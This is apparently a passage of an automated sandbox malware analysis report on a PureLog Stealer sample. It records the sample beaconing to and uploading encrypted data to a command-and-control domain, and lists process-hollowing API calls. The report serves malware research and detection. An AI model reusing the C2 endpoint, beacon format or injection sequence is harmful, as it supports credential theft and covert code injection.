                        server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1638&rtt_var=635&sent=19&recv=26&lost=0&retrans=0&sent_bytes=2853&recv_bytes=21491&delivery_rate=1696687&cwnd=198&unsent_bytes=0&cid=b87c7219dbb12583&ts=544&x=0"
                        2025-01-14 15:15:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                        Data Ascii: fok 8.46.123.189
                        2025-01-14 15:15:15 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        5192.168.2.549716172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:16 UTC284OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=PVRY6W5H1M5QJ1ASY
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 1404
                        Host: cultureddirtys.click
                        2025-01-14 15:15:16 UTC1404OUTData Raw: 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 56 52 59 36 57 35 48 31 4d 35 51 4a 31 41 53 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64
                        Data Ascii: --PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="pid"1--PVRY6W5H1M5QJ1ASYContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmd
                        2025-01-14 15:15:19 UTC1135INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=u536lt1vjekigivh1mtn9uv19t; expires=Sat, 10 May 2025 09:01:58 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BXwXZA2plmkjgNiGP%2F9LMl6WrL4iSSe7CsyBR6oaT81Yff0kvFQI65mcAA39MZPetnc9ZcylXxXn1gPzkv8aReN%2BSregzEXaSi68xn23owIgthOVCPxfKkLZ5HrIWS0GS4DsQFHQZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e949bc9440f79-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1534&min_rtt=1531&rtt_var=580&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2853&recv_bytes=2324&delivery_rate=1876606&cwnd=244&unsent_bytes=0&cid=3fc1d23d9518eb35&ts=3523&x=0"
                        2025-01-14 15:15:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                        Data Ascii: fok 8.46.123.189
                        2025-01-14 15:15:19 UTC5INData Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        6192.168.2.549719172.67.150.129443940C:\Users\user\Desktop\mWAik6b.exe
                        TimestampBytes transferredDirectionData
                        2025-01-14 15:15:20 UTC282OUTPOST /api HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=O7RCR1HE9Y0FP
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                        Content-Length: 572527
                        Host: cultureddirtys.click
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 36 39 43 32 36 46 45 33 30 36 44 34 32 44 42 43 33 46 32 38 44 31 32 46 36 31 45 34 38 42 0d 0a 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 52 43 52 31 48 45 39 59 30 46 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 7a 64 71 63 73 73 6d 64 70 76 6b 75 0d 0a 2d 2d 4f 37 52 43
                        Data Ascii: --O7RCR1HE9Y0FPContent-Disposition: form-data; name="hwid"2D69C26FE306D42DBC3F28D12F61E48B--O7RCR1HE9Y0FPContent-Disposition: form-data; name="pid"1--O7RCR1HE9Y0FPContent-Disposition: form-data; name="lid"LPnhqo--zdqcssmdpvku--O7RC
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 90 62 b8 b9 1c 83 23 1d 34 af a1 a3 f5 ec 40 f4 01 8e a7 3b 63 66 23 49 1f 2d 7d 3f 82 21 5b a0 c9 7c b7 89 16 ac df 95 fb ed 67 a7 3d fb b3 87 4c 74 68 b2 0e ad 1a d2 2e 42 e2 1c 04 b6 78 7a f3 5e f9 17 3f 18 65 b0 93 ba d8 6c b0 90 50 2b b7 a9 30 63 18 b9 78 df 74 7c c3 41 88 4a 66 e4 20 4a 6b 4d 73 e6 e5 2a 08 38 40 d3 46 87 10 c0 74 3f 7a 69 27 88 12 aa 92 ba 79 dd b0 04 45 6d 4e 88 7d a2 fe 64 b7 25 a2 2b 34 ac 98 b0 f8 3a 4d 93 27 19 b5 5b 2e 90 7e 86 81 21 7b e6 3f 7e 62 75 52 cf 6d 15 72 ef b2 6a c8 8e 69 40 e8 0c 8a 9d 37 8e 04 46 4b 37 1a d5 da 6e 32 2d a6 5a 76 f4 ac 5e 6f aa e7 d5 c7 85 65 40 96 3c 64 d9 98 38 78 06 75 fc 76 6b 30 d7 1e 03 d3 a1 89 55 6e 65 c6 1e 5a 56 73 a4 3e 1f e9 35 48 0b 3b 80 10 dd c4 d9 bf cd a8 06 84 00 1c 8d 0e 5d f1
                        Data Ascii: b#4@;cf#I-}?![|g=Lth.Bxz^?elP+0cxt|AJf JkMs*8@Ft?zi'yEmN}d%+4:M'[.~!{?~buRmrji@7FK7n2-Zv^oe@<d8xuvk0UneZVs>5H;]
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 99 9c 51 be 1e 63 64 d6 1e 74 53 7d 58 f2 0a 57 d3 47 85 a6 86 5b 2a c7 c7 31 52 a8 a9 67 9d f9 84 44 7b 3e 2c 08 c9 8d 85 60 e3 08 9b 9b b5 78 39 49 9e 9e bd a4 41 1b 3b 5b 9d de 54 e4 5b 77 bc d0 25 99 0a 05 42 2e f1 77 74 56 1c 27 4c 30 73 8a ec 27 25 be de 07 c8 71 61 f4 5d a1 0d cd 89 97 6a f5 b7 37 bf bf ee 53 67 35 08 a4 87 73 b3 e8 5f 37 5c 1e 84 93 50 fd 8f a2 fc f9 dc 5e 6d ef ee 38 fd 0c e3 18 df 97 a6 04 66 e2 d3 4a 4e dd 96 e1 a6 3e 19 a1 d7 8c 54 b7 5f 0c 1f 28 1e 7a f5 66 78 c6 e7 ed 4f 31 d6 4b 17 ee 93 30 da 84 ca 9b e0 e9 95 07 10 f3 53 10 e7 cb 45 ed 71 83 20 4e 79 d2 e0 a1 fc 0c 61 c6 88 55 47 55 57 c4 e2 5e ab b8 e2 55 eb 99 5b 56 77 aa 39 e3 55 c1 f5 42 7d c7 da 2b 78 5b 4f 1a 88 8c 94 4d d6 2a 0f d6 74 5e fc 23 36 4a 3d 63 cf 53 46
                        Data Ascii: QcdtS}XWG[*1RgD{>,`x9IA;[T[w%B.wtV'L0s'%qa]j7Sg5s_7\P^m8fJN>T_(zfxO1K0SEq NyaUGUW^U[Vw9UB}+x[OM*t^#6J=cSF
                        2025-01-14 15:15:20 UTC15331OUTData Raw: c1 b3 5a cd 1f ba 2c 6e af 6f 86 a3 c4 3f 22 0d 92 27 b5 8a c4 a9 40 9c 65 2f 2e f6 9c 7c 51 17 77 92 58 db 5c 55 59 60 cd 36 88 58 28 f9 ed b2 47 ee bc 82 e0 a0 f6 56 e0 ef b6 33 d0 19 d7 a3 9e e3 a0 f3 f6 98 c2 15 f8 67 b5 cb 54 04 4b c9 b1 b4 e3 74 f2 a4 e1 83 9b c0 43 46 fe 69 ab ee 4a c3 8f ee af 33 03 95 4d f6 e8 69 b6 6f e8 26 b3 a4 43 72 66 ca ec d8 0f fa 1e 96 0e 55 73 63 33 d1 a8 42 7d 3c 2b ca 75 b5 a4 70 23 7a 3d 47 6b 52 fa 72 cd 2f 72 da 9d d6 d5 f4 09 f6 8e b9 db 55 d3 bc ff f6 b6 bd 1d 12 13 72 3b 1e 71 56 7e a9 0e b9 8c bd c9 6a 73 6b 1a bc 22 58 79 43 95 c2 f6 17 5f 6d 19 08 71 5d d1 bb e2 b0 48 d7 a5 55 8e c8 23 c1 47 93 ad e2 ae aa 07 f3 0b e9 ac be a6 88 3a 97 39 73 c5 73 a5 ad d2 d7 4f d7 dd 9c 3b ba 52 ab 6b 24 91 f2 72 e9 21 6d 35
                        Data Ascii: Z,no?"'@e/.|QwX\UY`6X(GV3gTKtCFiJ3Mio&CrfUsc3B}<+up#z=GkRr/rUr;qV~jsk"XyC_mq]HU#G:9ssO;Rk$r!m5
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 1e 37 1b c6 f7 47 14 e1 22 41 82 00 d1 03 ea e2 6c ea 01 38 99 50 6e 30 89 ba 32 89 71 ae d6 56 c3 05 c5 b2 11 7f 33 b1 91 73 fa e5 a0 2c 4f c8 29 0a 56 04 d9 42 24 99 c5 3f 36 a1 2a 2b f9 07 ed d1 61 99 36 e4 4b 58 e1 97 4a d9 0f 0d 8c 23 ca 4c b2 25 11 a1 9c e7 24 a8 1d e6 ac 80 8d c2 b3 8e 3a cb 79 aa bb 55 54 ab 55 da 1b 1f 74 df 1d 87 2e 11 b3 a7 d7 b9 cc f4 0c 85 2e f3 ae e7 c8 e4 f3 61 0f 19 e6 b8 6d 32 b4 4a a5 5c e9 bb 06 5e 7f 34 77 01 97 e3 e7 5d 27 31 df 5e c0 d2 0a b9 db 2b 4d 07 19 1c 38 75 6b dc a9 82 0b 09 3e dd 7a dd c8 03 06 87 1c 87 ad 0f ba 60 84 37 df 4f f9 ef bc a1 69 1a a0 2e ed 78 07 2f 5d 11 42 ee ac 54 0d 0b fb 2b a6 fc 88 9a 61 e6 35 3c 81 a4 bc 3f 00 bd 07 ff ff 3b b6 57 3b 47 f9 5b 71 fe 85 93 7b 8a 23 ee 94 26 1a c3 cb e3 ac
                        Data Ascii: 7G"Al8Pn02qV3s,O)VB$?6*+a6KXJ#L%$:yUTUt..am2J\^4w]'1^+M8uk>z`7Oi.x/]BT+a5<?;W;G[q{#&
                        2025-01-14 15:15:20 UTC15331OUTData Raw: fc a4 61 81 9d f7 da 33 d5 f4 c8 65 e2 50 ce fd e5 7b 38 60 c5 6c ab 16 aa 38 e0 f4 d9 34 bc 55 bd 44 4b e0 db 5d 9a c9 7c 5a a9 87 16 31 70 11 2b 92 e2 35 23 4d b3 b3 50 52 84 fd a0 f1 53 12 b1 85 ff a6 69 d5 3b 8b c6 d5 38 0b 8f c8 10 c6 0d f0 e2 08 f5 a9 16 0d bc ba d7 7d 7a 4a fe c8 6a d3 e3 dd 19 2d e6 8d f1 2a 5a d0 7f be c4 93 61 2a 04 2a 10 8e 70 af bb 9f f5 c6 ba 4a ca b9 0c 26 95 68 77 a0 be 34 eb e4 d7 fb 09 8f 1b 9f ae 95 53 16 fd ba e8 c0 f4 ce 4a 80 af 72 f4 e7 c4 76 9d f3 eb d9 4c 91 58 3a 8f c9 10 a5 86 fd e5 c5 ac 30 6d 93 4e 80 35 9b 64 74 c1 fb f9 61 be 06 65 95 48 22 d1 73 c5 38 93 00 fe 8c 04 84 03 74 97 bb 6a ab 2e 74 45 34 73 b1 cf 15 8e 54 3e 82 74 cb 1c 8e 65 b9 32 60 ef 06 cc fd 02 33 10 cb e0 91 aa 8e bb d1 13 50 72 5c f1 30 2d
                        Data Ascii: a3eP{8`l84UDK]|Z1p+5#MPRSi;8}zJj-*Za**pJ&hw4SJrvLX:0mN5dtaeH"s8tj.tE4sT>te2`3Pr\0-
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 97 23 16 3c fa 5d 2a df 38 5f 45 3b 12 51 1b 10 ac 48 65 1e 13 80 9d 31 df 67 43 9e a2 a8 f5 0c 0b c0 bc c2 3a 7a 18 59 8b 7f 83 1e 0e e2 73 0b c4 41 25 92 f2 fd 99 37 78 c3 cd dd 5a 1a 48 59 50 ef c2 55 41 f7 cc b3 32 b1 18 35 89 83 b1 36 c2 60 2d 13 34 74 55 e0 97 42 da 51 33 03 31 28 9e ab 86 ee d9 be d8 13 09 f4 bc e4 12 63 be a6 f0 97 1b 20 29 9f 99 10 1a 41 d6 dd 4f 68 db ea cd ba 0c b4 75 ae 06 b8 36 ef 1d 3d be f0 65 86 32 3d f9 59 63 45 fd e1 6c d2 a2 31 25 7d 18 cd f1 cd 54 9c cf 79 08 ea fb 7e 69 49 2b 7b 73 7b df d2 a5 c0 05 35 43 09 95 93 48 31 ee f9 d1 0f ca f5 00 89 7d a9 eb 7e 5a 38 5e e6 b2 c0 6b d0 58 57 2f c3 ae c3 fa 10 a8 ec 94 70 76 a6 8c fe be ed 45 7a a8 e8 83 9c db 2b 3b 69 21 fc dd cd 65 5f 6b ab 76 c9 74 ac 78 c4 e0 22 2f b6 78
                        Data Ascii: #<]*8_E;QHe1gC:zYsA%7xZHYPUA256`-4tUBQ31(c )AOhu6=e2=YcEl1%}Ty~iI+{s{5CH1}~Z8^kXW/pvEz+;i!e_kvtx"/x
                        2025-01-14 15:15:20 UTC15331OUTData Raw: db b0 7a fa 9e e7 d7 78 3c 19 87 b5 2e a4 70 5f 94 0e cf 80 a8 9c cd 73 01 82 74 20 9a d7 03 a3 be b7 3f 07 68 e6 9c dd e4 4c f9 b8 ec 24 29 7a 05 58 3f 60 e0 40 7c 9b 18 bd 9b 0f 1c f9 4f 73 fb e2 69 b9 79 bb b0 f9 d1 ba 78 30 db 62 a0 64 44 52 5c 2f f2 32 78 1c 5e c2 d1 a9 d9 07 89 16 b1 bb 3b ae 5a 48 42 2b a7 70 92 2a 15 b6 96 0e b7 d9 aa 0b 82 6d b8 2e de e1 d9 d9 d5 e6 51 6d 11 fa 17 f1 10 42 c7 1c e1 12 98 d2 50 b8 30 76 ef 09 7f 8e c5 79 e7 ba 34 01 d3 ec e7 da 28 6f f3 6e a2 d3 5e e3 ca 20 09 a8 b1 a2 15 c9 9b 58 1f ba c0 3b aa ef 87 79 e3 c2 95 bb aa 82 66 ac 69 b7 ee fe 4c 2d f2 66 3f ba 56 8b 16 bb 8c d9 3b 18 49 c3 1c 9b f8 a6 15 fe bf d6 45 2b 9d bf b2 dd df 8a 53 ef 26 e1 49 69 fb f0 13 aa 4b ad 17 e3 54 e9 b2 66 a7 b0 d0 25 40 38 4a 02 a4
                        Data Ascii: zx<.p_st ?hL$)zX?`@|Osiyx0bdDR\/2x^;ZHB+p*m.QmBP0vy4(on^ X;yfiL-f?V;IE+S&IiKTf%@8J
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 14 d1 fa 04 ef a5 f2 c6 10 43 91 67 99 83 e5 5c 0a 58 ac d8 fe 5a ca e6 3b ee ee 75 9e ee 32 23 12 92 6b 8f b3 21 38 80 8c c5 01 26 3d 1c fd 56 c3 f1 be af 84 93 0a 20 d6 8d 61 a5 6b 35 9e 44 22 44 0f 94 23 1f 02 39 cb c3 97 51 62 ed fc 1d 8e 0a 30 89 9f 09 58 44 3f 96 22 e8 34 55 21 c9 24 52 76 af 6a 90 73 51 51 4b 49 1f 40 b2 17 29 d6 9b 7c 06 be e4 65 20 c9 57 c6 c0 32 b0 40 1c 9d 38 2b cc 47 b3 e4 2c 2f e0 4a 2e 23 0e 21 8b 02 a7 42 2f a0 60 eb a6 d0 7a 03 dc d2 6d 7a 3b e3 27 68 6f d0 3a 13 ce bd 4b 49 52 32 34 14 80 64 4f 58 d0 0c 0b 14 f7 0e 11 ae 2c e2 08 85 b1 5b 82 4c 01 2e c4 ca 31 99 34 25 04 84 2d 51 db c5 b2 ac b9 10 18 22 49 76 80 4a 81 04 45 46 07 ce c0 dc d0 bc 2e 49 9b 5d b2 9e d2 de a6 8d 19 db 4e f1 a9 5b 76 3d 0d 4c 33 45 27 b7 eb f4
                        Data Ascii: Cg\XZ;u2#k!8&=V ak5D"D#9Qb0XD?"4U!$RvjsQQKI@)|e W2@8+G,/J.#!B/`zmz;'ho:KIR24dOX,[L.14%-Q"IvJEF.I]N[v=L3E'
                        2025-01-14 15:15:20 UTC15331OUTData Raw: 3a 30 95 12 e8 41 3e 6b 62 2b 3b 51 11 70 bb 61 1a aa f3 28 6d 49 a4 84 d1 d8 f9 ab 01 31 fb 71 1e d0 ed 62 50 f4 9a 75 dc ca d8 bf ed e6 bd b7 55 84 38 e4 8b 7d 2f 97 c7 9f fe b7 55 e9 3c 2a 4c 26 ef 51 58 9e 0d 1c c2 60 f3 bb ad f7 9f 91 be b8 12 e4 fa fb e3 ab 68 83 82 c5 84 d4 92 21 9a 4f a6 c3 a9 f8 d1 d0 95 27 eb 7d 77 68 fa cc d4 f9 fc c8 87 69 01 2c 5f fe 58 6f 08 3f c1 1b df 78 73 06 af f4 dd 94 98 42 6f 92 be c1 92 3e 60 17 34 23 11 e0 b0 f2 a6 c2 57 89 37 8a 5d 68 5a 4d 8a ce b4 ce 38 5c 00 d8 7f b3 6f ea b0 26 3b 8a fd 9c b9 6f 82 bc ff 6a 0d 21 b8 81 54 68 04 90 12 10 5e c1 87 5c 99 75 41 20 b9 04 40 ff da 3f de 1b ac 2c ca da 87 dc fb 06 8b b0 49 27 ff fe eb 6b 34 7e c2 8a 42 8e 44 de 66 d0 69 5f e3 17 2c 46 f9 b4 81 00 9e 67 57 74 dc 40 72
                        Data Ascii: :0A>kb+;Qpa(mI1qbPuU8}/U<*L&QX`h!O'}whi,_Xo?xsBo>`4#W7]hZM8\o&;oj!Th^\uA @?,I'k4~BDfi_,FgWt@r
                        2025-01-14 15:15:29 UTC1151INHTTP/1.1 200 OK
                        Date: Tue, 14 Jan 2025 15:15:29 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Set-Cookie: PHPSESSID=hfp2gi7cc5r47hqinruugi88sg; expires=Sat, 10 May 2025 09:02:01 GMT; Max-Age=9999999; path=/
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: no-store, no-cache, must-revalidate
                        Pragma: no-cache
                        X-Frame-Options: DENY
                        X-Content-Type-Options: nosniff
                        X-XSS-Protection: 1; mode=block
                        cf-cache-status: DYNAMIC
                        vary: accept-encoding
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLk4R7ao9UvaYY2ZkiSWBFofSPGANoppm8nqAsMOSVueYyBnf%2BC2C%2BwNWLbE23kyA%2FnB5jbr%2B4HDH0qxtc59ZLL7l%2B%2Fz7l8XQdUx%2FTImjyOmlpJ9OBshcMZBruosJPLi25w8WL%2F7rw%3D%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 901e94b6f8d3de98-EWR
                        alt-svc: h3=":443"; ma=86400
                        server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1554&rtt_var=589&sent=205&recv=586&lost=0&retrans=0&sent_bytes=2852&recv_bytes=575073&delivery_rate=1846932&cwnd=212&unsent_bytes=0&cid=ca5232a62a8b3249&ts=8626&x=0"


                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Target ID:0
                        Start time:10:15:08
                        Start date:14/01/2025
                        Path:C:\Users\user\Desktop\mWAik6b.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\mWAik6b.exe"
                        Imagebase:0x30000
                        File size:456'304 bytes
                        MD5 hash:16A53E18CA53FE602974F0A4B7FFBF3C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:10:15:08
                        Start date:14/01/2025
                        Path:C:\Users\user\Desktop\mWAik6b.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\mWAik6b.exe"
                        Imagebase:0x250000
                        File size:456'304 bytes
                        MD5 hash:16A53E18CA53FE602974F0A4B7FFBF3C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:10:15:08
                        Start date:14/01/2025
                        Path:C:\Users\user\Desktop\mWAik6b.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\mWAik6b.exe"
                        Imagebase:0xc80000
                        File size:456'304 bytes
                        MD5 hash:16A53E18CA53FE602974F0A4B7FFBF3C
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:6
                        Start time:10:15:09
                        Start date:14/01/2025
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928
                        Imagebase:0x200000
                        File size:483'680 bytes
                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Reset < >

                          Execution Graph

                          Execution Coverage:14.1%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:22.5%
                          Total number of Nodes:40
                          Total number of Limit Nodes:3
                          execution_graph 1903 8c0ced 1904 8c0cf2 1903->1904 1909 8c0ac0 1904->1909 1907 8c0d0b 1910 8c0b44 1909->1910 1911 8c0ad0 1909->1911 1910->1907 1915 8c27c8 1910->1915 1911->1910 1912 8c0ac0 3 API calls 1911->1912 1913 8c0d03 1912->1913 1913->1910 1914 8c27c8 3 API calls 1913->1914 1914->1910 1922 8c27c8 2 API calls 1915->1922 1924 8c2880 1915->1924 1916 8c2801 1921 8c283c 1916->1921 1930 8c2104 1916->1930 1918 8c2b1b VirtualProtect 1919 8c2b58 1918->1919 1919->1907 1920 8c284b 1920->1907 1921->1918 1921->1920 1922->1916 1925 8c28a6 1924->1925 1929 8c28b0 1924->1929 1925->1916 1926 8c2b1b VirtualProtect 1927 8c2b58 1926->1927 1927->1916 1928 8c2aaa 1928->1916 1929->1926 1929->1928 1931 8c2ad0 VirtualProtect 1930->1931 1933 8c2b58 1931->1933 1933->1921 1934 8c0b88 1938 8c0ba4 1934->1938 1935 8c0ceb 1936 8c0ac0 3 API calls 1937 8c0d03 1936->1937 1937->1935 1939 8c27c8 3 API calls 1937->1939 1938->1935 1938->1936 1939->1935 1940 24a80e2 1941 24a80fc CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 1940->1941 1942 24a81a3 WriteProcessMemory 1941->1942 1943 24a80ab 1941->1943 1944 24a81e8 1942->1944 1947 24a8193 TerminateProcess 1943->1947 1948 24a80ea GetPEB 1943->1948 1945 24a822a WriteProcessMemory Wow64SetThreadContext ResumeThread 1944->1945 1946 24a81ed WriteProcessMemory 1944->1946 1946->1944 1947->1943 1948->1941

                          Control-flow Graph

                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024A7ED7,024A7EC7), ref: 024A80FD
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024A8110
                          • Wow64GetThreadContext.KERNEL32(00000390,00000000), ref: 024A812E
                          • ReadProcessMemory.KERNELBASE(00000384,?,024A7F1B,00000004,00000000), ref: 024A8152
                          • VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 024A817D
                          • TerminateProcess.KERNELBASE(00000384,00000000), ref: 024A819C
                          • WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 024A81D5
                          • WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 024A8220
                          • WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 024A825E
                          • Wow64SetThreadContext.KERNEL32(00000390,02480000), ref: 024A829A
                          • ResumeThread.KERNELBASE(00000390), ref: 024A82A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237143554.00000000024A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_24a7000_mWAik6b.jbxd
                          Similarity
                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                          • String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                          • API String ID: 2440066154-232383841
                          • Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                          • Instruction ID: 48a81c47ba5c8f86bcdbbc6a1480c2fb3a4779b0be9f8f82bd397b2d7f146da1
                          • Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
                          • Instruction Fuzzy Hash: 4FB1067660064AAFDB60CF68CC80BDAB7A5FF88714F158125EA0CAB341D774FA51CB94

                          Control-flow Graph

                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024A7ED7,024A7EC7), ref: 024A80FD
                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024A8110
                          • Wow64GetThreadContext.KERNEL32(00000390,00000000), ref: 024A812E
                          • ReadProcessMemory.KERNELBASE(00000384,?,024A7F1B,00000004,00000000), ref: 024A8152
                          • VirtualAllocEx.KERNELBASE(00000384,?,?,00003000,00000040), ref: 024A817D
                          • TerminateProcess.KERNELBASE(00000384,00000000), ref: 024A819C
                          • WriteProcessMemory.KERNELBASE(00000384,00000000,?,?,00000000,?), ref: 024A81D5
                          • WriteProcessMemory.KERNELBASE(00000384,00400000,?,?,00000000,?,00000028), ref: 024A8220
                          • WriteProcessMemory.KERNELBASE(00000384,?,?,00000004,00000000), ref: 024A825E
                          • Wow64SetThreadContext.KERNEL32(00000390,02480000), ref: 024A829A
                          • ResumeThread.KERNELBASE(00000390), ref: 024A82A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237143554.00000000024A7000.00000040.00000800.00020000.00000000.sdmp, Offset: 024A7000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_24a7000_mWAik6b.jbxd
                          Similarity
                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
                          • String ID: TerminateProcess
                          • API String ID: 2440066154-2873147277
                          • Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
                          • Instruction ID: 6b17728a26a1ba351893947ec41d0d8b356c1e224319ad151686e5da27d4e04e
